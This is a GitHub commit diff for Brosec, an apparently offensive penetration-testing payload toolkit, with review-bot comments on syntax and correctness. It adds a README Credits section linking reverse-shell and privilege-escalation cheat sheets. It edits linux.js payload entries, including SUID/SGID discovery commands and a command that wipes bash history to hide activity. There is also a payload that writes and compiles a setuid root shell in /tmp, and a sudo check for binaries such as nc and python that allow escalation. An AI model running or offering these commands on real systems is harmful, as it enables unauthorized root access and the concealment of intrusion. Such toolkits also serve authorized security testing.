Minor improvements to a few payloads, added a Credits section to the README
gabemarshall committed Jun 29, 2016
1 parent 12b8686 commit e9dda63
Showing 2 changed files with 15 additions and 13 deletions.
12 changes: 12 additions & 0 deletions README.md
Expand Up @@ -104,3 +104,15 @@ Swag
<br><br> Submit a pull request, create an issue, or just send feedback to <[email protected]> and I'll happily send you a sticker (supplies limited, free shipping to continental US only).

Otherwise you can order one from [StickerMule](https://www.stickermule.com/marketplace/10877-brosec-security-for-bros)


Credits
======

Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In addition, many payloads were referenced from other resources and deserve a shoutout.

- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)

Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor)
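
Review bot: The third entry in the new Credits list has a typo in its link label: it reads `obsecuresecurity`, while the URL it points to is `obscuresecurity.blogspot.com`. Please make the label match the blog name. Minor: the Red Team Field Manual is credited in the paragraph above the list but is the only credited source without a link, so consider adding one for consistency.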
16 changes: 3 additions & 13 deletions payloads/linux.js
Expand Up @@ -83,8 +83,8 @@ Load({
// Linux File Commands pg 6
Load({ payload: "diff file1 file2", desc: "Compare two files", category: "File System"})
Load({ payload: "strings -n 5", desc: "Set minimum string length", category: "File System"})
Load({ payload: "find / -perm +6000 -type f -exec ls -ld {} \\;", desc: "Find all SUID binaries", category: "File System"})
Load({ payload: "find . -type f -mmin -5 -not -path \"*/proc/*\" 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"})
Load({ payload: "find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null", desc: "Find all SUID and SGID files", category: "File System"})
Load({ payload: "find . -type f -mmin -5 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"})

Load({
desc: "Find files and grep results",
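
Review bot: The SUID/SGID `find` payload does not do what its `desc` says, because `-o` binds more loosely than the implicit AND: the expression parses as `-perm -g=s` OR (`-perm -4000 ! -type l -maxdepth 3 -exec ...`). Anything matching `-perm -g=s` short-circuits the `-o` and never reaches `-exec`, and since an explicit action is present there is no implicit `-print`, so SGID files are silently skipped. Group the permission tests and put the global option first, for example `find / -maxdepth 3 \( -perm -4000 -o -perm -2000 \) ! -type l -exec ls -ld {} \; 2>/dev/null` (with the backslashes doubled inside the JS string). Also note that `-maxdepth 3` means the result is not "all" such files, so either drop it or reword the `desc`. The same applies to the "modified in the last 5 minutes" entry if it is meant to be run from `/`: the variant without `-not -path "*/proc/*"` will include `/proc` noise.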
Expand Down Expand Up @@ -218,20 +218,10 @@ Load({ payload: "rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null", des

// ############### Privesc ######################

// Load({
// desc: "Find files and grep results",
// payload: "find . -type f -exec grep -IHin '<PROMPT (search string)>' 2>/dev/null {} +",
// callback: function(bro){
// question("What search term would you like to use?");
// ask.some(questions, bro);
// },
// category: "File System"
// })

// Credit to @LuxCupitor
Load({ title: "Write r00t.c to the /tmp directory and compile", payload: "echo -e '#include <unistd.h>\\nint main(int argc, char **argv)\\n{\\nsetuid(0);\\nsetgid(0);\\nexecl(\"/bin/sh\", \"sh\", NULL);\\nreturn 1;\\n}\\n' > /tmp/r00t.c;gcc /tmp/r00t.c -o /tmp/r00t", category: "Privesc"})
Load({ title: "Check for privesc via sudo privileges", payload: "sudo -S -l 2>/dev/null | grep -w 'nmap\\|perl\\|awk\\|find\\|bash\\|sh\\|man\\|more\\|less\\|vi\\|vim\\|nc\\|netcat\\|python\\|ruby\\|lua\\|irb\\|chown\\|chmod\\|zip\\|tar\\|tcpdump\\|gdb'", category: "Privesc"})
//
//
/*
######################################################
############### End of Payloads ######################
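
Review bot: The two Privesc entries that sit directly under the removed commented-out block use `title:` as their key, while every other `Load()` call visible in this diff uses `desc:`. If `Load()` only reads `desc`, these two entries will show up without a description, so please confirm it accepts both or rename the key. While cleaning up here, the bare `//` line left just above the `End of Payloads` banner can go as well, since the commented-out block it belonged to has been removed.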